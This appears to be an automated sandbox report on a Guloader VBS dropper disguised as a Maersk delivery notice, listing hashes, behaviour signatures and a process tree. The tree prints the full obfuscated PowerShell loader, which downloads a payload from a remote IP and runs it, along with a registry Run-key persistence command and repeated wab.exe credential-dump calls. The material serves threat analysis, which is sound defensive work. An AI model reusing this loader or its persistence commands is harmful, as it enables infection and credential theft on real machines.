Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
26-06-2024 14:04
General
-
Target
Maersk_Pre_awb_samedaydelivery_63648938475939020000.vbs
-
Size
186KB
-
MD5
24cf2fb7a16835406fbb8110f7728d06
-
SHA1
c86b83506bcd6e6a5e72dd59b80f6d73fe7acd1c
-
SHA256
c6264b70bc76be0d3d1d461e357db3b0fa9397fd7fd70740824dea2663abf4c0
-
SHA512
85c37a37fd4e63f9add57055f65f887c5f21f37ff66caae518508b2e0e815a9daa14db8dbbf6dfa8162cb127d2d7f834d61c17dd707da8caf396cf46075ed936
-
SSDEEP
3072:5mN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZw:508GxbKja3+DCbKCvBB/WnHXC/sLJFJD
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 31 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 30 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Maersk_Pre_awb_samedaydelivery_63648938475939020000.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Andetsprog Madeiran Tenours62 Bungle215 Friktion Turriculae Assendency Faldskrmssoldaters necrophagy Nidology Retarding Rgerrighedernes Ufornuft Thocht Suppe tilbagekaldelsesgrundens Vandels opmuntringsprmies Tilsigende Halt Dissceptered Rammer Antings Wholesales Andetsprog Madeiran Tenours62 Bungle215 Friktion Turriculae Assendency Faldskrmssoldaters necrophagy Nidology Retarding Rgerrighedernes Ufornuft Thocht Suppe tilbagekaldelsesgrundens Vandels opmuntringsprmies Tilsigende Halt Dissceptered Rammer Antings Wholesales';$anticamera = 1;Function Nihilisten($Sermonettino){$Dansesteder=$Sermonettino.Length-$anticamera;$Sporeplantes='SUBSTRIN';$Sporeplantes+='G';For( $Renoveringerne=1;$Renoveringerne -lt $Dansesteder;$Renoveringerne+=2){$Andetsprog+=$Sermonettino.$Sporeplantes.Invoke( $Renoveringerne, $anticamera);}$Andetsprog;}function Rectangular($Buoyant){ . ($Enschedule22) ($Buoyant);}$Dory=Nihilisten 'CM o z,iKl l.a,/C5 . 0 M( W i,nSdVo.wAs. TN T. 1 0 . 0 ; AW.i n 6R4 ;A Gx 6t4z;A Lr.v :.1G2.1.. 0 )o AGVeScNk o./ 2L0S1.0 0 1M0,1U ,FNiArTe.f oSx /,1.2,1 .F0F ';$Strejfet=Nihilisten 'AU,s eSr - A.g e.njtT ';$Friktion=Nihilisten 'ShGtPtFpF: /R/M1E0O3A.T1 9 5B.V2 3 7A.S4M3 /NApdSnEaPt,i,oBnS.VqSxgdC ';$Salvadoriansk=Nihilisten '.>B ';$Enschedule22=Nihilisten ',iCeGx. ';$Cartogram='Faldskrmssoldaters';$Inocarpin = Nihilisten '.e c,hUo, %,aCp.pLd a.t.a.%,\TS,aMl,tPuBrLt e,rOn e s .dGAe vU U&U& .e c.h oF HtU ';Rectangular (Nihilisten ' $ gRl.oSb a l :GSSaEm v iBtHtCi gJhVePdrsGlDs eFs.t 1 9S5T=S(Sc mFd ./Oc, L$ IEnAoscFa r pMi,n,) ');Rectangular (Nihilisten 'A$DgslAo b aAl : BMu n g,lZeI2R1.5T=D$ F.r iUk tAi.o.n . s pBl i t ( $ SAaPl,v,aSd o r iAa nKs kG) ');Rectangular (Nihilisten 'E[MNRe tK.,SMeRr v i c,eAP oIi n tCMBa.nRaGg e ru]O:T:CS,eVc.u.rMi tUy P r o,t.oBcDo l =I T[SNSeSt .SSTe ctu,rSi,t y.PAr,oStBoFc o,l TIy p eA]p:T:ETNlrsE1 2S ');$Friktion=$Bungle215[0];$ryaens= (Nihilisten 'T$ g lNoTbSa l :KS kLrSi vHe lSaSb e,lI= N epw -BO b j,eTcStM .S yOsEtseSm .RNSe.t.. W,e bNCfl iBeBn,t');$ryaens+=$Samvittighedslsest195[1];Rectangular ($ryaens);Rectangular (Nihilisten 'r$,S,k.r iSvOe.lUaBb.eUlL..HPeAaEd,e,rPs,[ $ S t,rPe.j.f eEtN] = $,DmoArKyV ');$Revellings251=Nihilisten ' $.STkBrSi v eNlTaUbSeTlM.LD oWw nOlUoAa,dDF iAlGeV(,$BFPr i,k t iFoPn ,K$CRFaSmLmUe,r,)P ';$Rammer=$Samvittighedslsest195[0];Rectangular (Nihilisten 'B$FgBl.oVbbaPlw:OA f,sDkQe dys f ebsFtPeCn sR=,( TdeSsPtV-,PUaPtWhF ,$,R aKm.m.e.rS)S ');while (!$Afskedsfestens) {Rectangular (Nihilisten ' $dgDl oHb aSlA: H vBiDl e nBeR=,$,t,rSuTeO ') ;Rectangular $Revellings251;Rectangular (Nihilisten 'SSKtFaVrKt.-HSRlAeAe.pR .4 ');Rectangular (Nihilisten 'R$Fg l oJb,aHlF:aA f sSkSeAdAs,fseLsOtEe,n sT= (ST.e s t - PFaPtRhN $YRUaNmpm e,rL) ') ;Rectangular (Nihilisten 'A$LgIl o bBaUlt:,TUe n oBuDr,sU6P2V=B$ g l oHbBa lL: MWa d,eNi r aCn.+.+ % $,B.u,n g,l e 2 1V5 .Hc o,u n,t. ') ;$Friktion=$Bungle215[$Tenours62];}$centrifugeringen=327851;$Laeotropic=24997;Rectangular (Nihilisten 'E$.g l,o b a,lC:.nBe cDr o pbh aDg y. .=M AG e,t -IC oSnSt eunVt .$FRCa m m eOrS ');Rectangular (Nihilisten ' $Pg,lSo,b aMl : ETx o c cAiKp i tVa,l =P [,S,y,sGtaeEmC. CFoDn vFeWr.t ] : :CF,rVo,mRBOa s,eR6,4TSFt ruiLnRgH(a$,n.e.cHr o pCh aSgPyV)M ');Rectangular (Nihilisten 'K$,gOlUo b aMl,:UR g eTrTr.imgAhIe d eFr n els. = [ S yFs,tPeFmG. TEeuxOtV.KE,n,cAopdri nDgU]P:,:FA SBC IEIF.RGOe.t SStHr iPnRgF(M$ ETx oGcscNi pUi tkaPl )B ');Rectangular (Nihilisten ' $ gSlTo b a lD:.JPurdJgPeSs,h,iSpR=A$ RLgFeZrMrSi gAhOeMdDeGr nFe,sB.BsFuibPs tmrBiAnTgL(S$ c eKnAt r.i f,uSgte r iMn.g e,nC,.$,LBaAe o tMr o pBiAc,), ');Rectangular $Judgeship;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salturternes.Gev && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Andetsprog Madeiran Tenours62 Bungle215 Friktion Turriculae Assendency Faldskrmssoldaters necrophagy Nidology Retarding Rgerrighedernes Ufornuft Thocht Suppe tilbagekaldelsesgrundens Vandels opmuntringsprmies Tilsigende Halt Dissceptered Rammer Antings Wholesales Andetsprog Madeiran Tenours62 Bungle215 Friktion Turriculae Assendency Faldskrmssoldaters necrophagy Nidology Retarding Rgerrighedernes Ufornuft Thocht Suppe tilbagekaldelsesgrundens Vandels opmuntringsprmies Tilsigende Halt Dissceptered Rammer Antings Wholesales';$anticamera = 1;Function Nihilisten($Sermonettino){$Dansesteder=$Sermonettino.Length-$anticamera;$Sporeplantes='SUBSTRIN';$Sporeplantes+='G';For( $Renoveringerne=1;$Renoveringerne -lt $Dansesteder;$Renoveringerne+=2){$Andetsprog+=$Sermonettino.$Sporeplantes.Invoke( $Renoveringerne, $anticamera);}$Andetsprog;}function Rectangular($Buoyant){ . ($Enschedule22) ($Buoyant);}$Dory=Nihilisten 'CM o z,iKl l.a,/C5 . 0 M( W i,nSdVo.wAs. TN T. 1 0 . 0 ; AW.i n 6R4 ;A Gx 6t4z;A Lr.v :.1G2.1.. 0 )o AGVeScNk o./ 2L0S1.0 0 1M0,1U ,FNiArTe.f oSx /,1.2,1 .F0F ';$Strejfet=Nihilisten 'AU,s eSr - A.g e.njtT ';$Friktion=Nihilisten 'ShGtPtFpF: /R/M1E0O3A.T1 9 5B.V2 3 7A.S4M3 /NApdSnEaPt,i,oBnS.VqSxgdC ';$Salvadoriansk=Nihilisten '.>B ';$Enschedule22=Nihilisten ',iCeGx. ';$Cartogram='Faldskrmssoldaters';$Inocarpin = Nihilisten '.e c,hUo, %,aCp.pLd a.t.a.%,\TS,aMl,tPuBrLt e,rOn e s .dGAe vU U&U& .e c.h oF HtU ';Rectangular (Nihilisten ' $ gRl.oSb a l :GSSaEm v iBtHtCi gJhVePdrsGlDs eFs.t 1 9S5T=S(Sc mFd ./Oc, L$ IEnAoscFa r pMi,n,) ');Rectangular (Nihilisten 'A$DgslAo b aAl : BMu n g,lZeI2R1.5T=D$ F.r iUk tAi.o.n . s pBl i t ( $ SAaPl,v,aSd o r iAa nKs kG) ');Rectangular (Nihilisten 'E[MNRe tK.,SMeRr v i c,eAP oIi n tCMBa.nRaGg e ru]O:T:CS,eVc.u.rMi tUy P r o,t.oBcDo l =I T[SNSeSt .SSTe ctu,rSi,t y.PAr,oStBoFc o,l TIy p eA]p:T:ETNlrsE1 2S ');$Friktion=$Bungle215[0];$ryaens= (Nihilisten 'T$ g lNoTbSa l :KS kLrSi vHe lSaSb e,lI= N epw -BO b j,eTcStM .S yOsEtseSm .RNSe.t.. W,e bNCfl iBeBn,t');$ryaens+=$Samvittighedslsest195[1];Rectangular ($ryaens);Rectangular (Nihilisten 'r$,S,k.r iSvOe.lUaBb.eUlL..HPeAaEd,e,rPs,[ $ S t,rPe.j.f eEtN] = $,DmoArKyV ');$Revellings251=Nihilisten ' $.STkBrSi v eNlTaUbSeTlM.LD oWw nOlUoAa,dDF iAlGeV(,$BFPr i,k t iFoPn ,K$CRFaSmLmUe,r,)P ';$Rammer=$Samvittighedslsest195[0];Rectangular (Nihilisten 'B$FgBl.oVbbaPlw:OA f,sDkQe dys f ebsFtPeCn sR=,( TdeSsPtV-,PUaPtWhF ,$,R aKm.m.e.rS)S ');while (!$Afskedsfestens) {Rectangular (Nihilisten ' $dgDl oHb aSlA: H vBiDl e nBeR=,$,t,rSuTeO ') ;Rectangular $Revellings251;Rectangular (Nihilisten 'SSKtFaVrKt.-HSRlAeAe.pR .4 ');Rectangular (Nihilisten 'R$Fg l oJb,aHlF:aA f sSkSeAdAs,fseLsOtEe,n sT= (ST.e s t - PFaPtRhN $YRUaNmpm e,rL) ') ;Rectangular (Nihilisten 'A$LgIl o bBaUlt:,TUe n oBuDr,sU6P2V=B$ g l oHbBa lL: MWa d,eNi r aCn.+.+ % $,B.u,n g,l e 2 1V5 .Hc o,u n,t. ') ;$Friktion=$Bungle215[$Tenours62];}$centrifugeringen=327851;$Laeotropic=24997;Rectangular (Nihilisten 'E$.g l,o b a,lC:.nBe cDr o pbh aDg y. .=M AG e,t -IC oSnSt eunVt .$FRCa m m eOrS ');Rectangular (Nihilisten ' $Pg,lSo,b aMl : ETx o c cAiKp i tVa,l =P [,S,y,sGtaeEmC. CFoDn vFeWr.t ] : :CF,rVo,mRBOa s,eR6,4TSFt ruiLnRgH(a$,n.e.cHr o pCh aSgPyV)M ');Rectangular (Nihilisten 'K$,gOlUo b aMl,:UR g eTrTr.imgAhIe d eFr n els. = [ S yFs,tPeFmG. TEeuxOtV.KE,n,cAopdri nDgU]P:,:FA SBC IEIF.RGOe.t SStHr iPnRgF(M$ ETx oGcscNi pUi tkaPl )B ');Rectangular (Nihilisten ' $ gSlTo b a lD:.JPurdJgPeSs,h,iSpR=A$ RLgFeZrMrSi gAhOeMdDeGr nFe,sB.BsFuibPs tmrBiAnTgL(S$ c eKnAt r.i f,uSgte r iMn.g e,nC,.$,LBaAe o tMr o pBiAc,), ');Rectangular $Judgeship;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salturternes.Gev && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lamenting" /t REG_EXPAND_SZ /d "%Hyraciform% -w 1 $Inextinguishables=(Get-ItemProperty -Path 'HKCU:\Americas\').skrupulses;%Hyraciform% ($Inextinguishables)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lamenting" /t REG_EXPAND_SZ /d "%Hyraciform% -w 1 $Inextinguishables=(Get-ItemProperty -Path 'HKCU:\Americas\').skrupulses;%Hyraciform% ($Inextinguishables)"6⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vblevdaoop"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fdzwwwkhkxkme"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3028 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pyehxodjyfcrgrnr"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\knsyt"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 372 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uhfrufao"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xjlkvylqnsq"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rqybrwfbbovvrgglhljuetpncuhbpne"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2168 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bsmuspqvxwnabmupzwwnoycwkaqkiyvegl"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mmresh"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gbnwpoviybjypbvhjtwihlines"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jdsopggcmjblahjlsdrbsqdefzwfd"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tyyhqrqdartqcnfpcoedddpnnfooelngw"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yhzrnqoikwpoycyzudeyvrve"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ajeboiykxehbbimddorrgwqviets"5⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ldrupbjdlmzglpipnzetjileqkdtrxg"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fsflladpziezxqmvolsm"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qmlemsornrwezeazxwenkwj"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\spypnkzkjzorkkxdogzhvbdmlj"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mwmojjtwwvskwlb"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xyzzkcepkdkpyrpnzv"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hserkuprylcuixdrigmvy"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\chsjhbbcmi"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ejgbiluwaqysx"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\odlmieeywyrfhtsn"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tnmwfdbd"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eprogvmellf"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gjxhhgxyztxuiuv"5⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bytydmrjnqtouvzsolorgbokvoumxkrppr"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lsyjefc"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 528 -s 126⤵
- Program crash
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vudcfxnfxg"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 126⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4016 -ip 40161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3028 -ip 30281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1720 -ip 17201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 372 -ip 3721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4484 -ip 44841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4648 -ip 46481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2168 -ip 21681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1860 -ip 18601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4124 -ip 41241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4024 -ip 40241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 344 -ip 3441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3516 -ip 35161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1728 -ip 17281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 856 -ip 8561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4720 -ip 47201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 440 -ip 4401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3848 -ip 38481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4200 -ip 42001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4892 -ip 48921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2060 -ip 20601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1056 -ip 10561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3368 -ip 33681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3992 -ip 39921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2944 -ip 29441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1272 -ip 12721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3208 -ip 32081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2132 -ip 21321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2300 -ip 23001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 528 -ip 5281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4268 -ip 42681⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jcui2abp.lgi.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Salturternes.GevFilesize
459KB
MD56ef66957717bc15ae76851390564ca9c
SHA15bb6373bcaecfaa6a584185d9c0980cdb9860611
SHA256391996b3a8b0a6ad1aac1fb9834fb1b266d009733e6c1e8c7684f213de528716
SHA5123f5febee655e3cd58f73fef4e24b0526469c777555dfc027ab9634e46439d24ce11cc97d64af0d2c8affcade2b34058304b12687d0ac6eb419e80130da219a71
-
memory/1052-89-0x0000000000D40000-0x0000000000D59000-memory.dmpFilesize
100KB
-
memory/1052-46-0x0000000002260000-0x0000000003BE3000-memory.dmpFilesize
25.5MB
-
memory/1052-92-0x0000000000D40000-0x0000000000D59000-memory.dmpFilesize
100KB
-
memory/1052-93-0x0000000000D40000-0x0000000000D59000-memory.dmpFilesize
100KB
-
memory/1720-51-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/2500-16-0x00007FFFF3350000-0x00007FFFF3E11000-memory.dmpFilesize
10.8MB
-
memory/2500-4-0x00007FFFF3353000-0x00007FFFF3355000-memory.dmpFilesize
8KB
-
memory/2500-15-0x00007FFFF3350000-0x00007FFFF3E11000-memory.dmpFilesize
